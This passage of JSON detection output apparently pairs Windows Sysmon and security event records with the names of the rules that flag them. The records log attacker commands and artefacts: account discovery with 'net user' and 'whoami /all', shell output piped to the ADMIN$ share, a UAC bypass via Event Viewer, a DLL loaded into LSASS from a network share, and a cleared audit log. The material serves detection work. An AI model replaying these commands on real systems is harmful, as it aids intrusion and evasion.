01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution_attributes":{"ProcessID":3180,"ThreadID":4224},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution_attributes":{"ProcessID":792,"ThreadID":3120},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 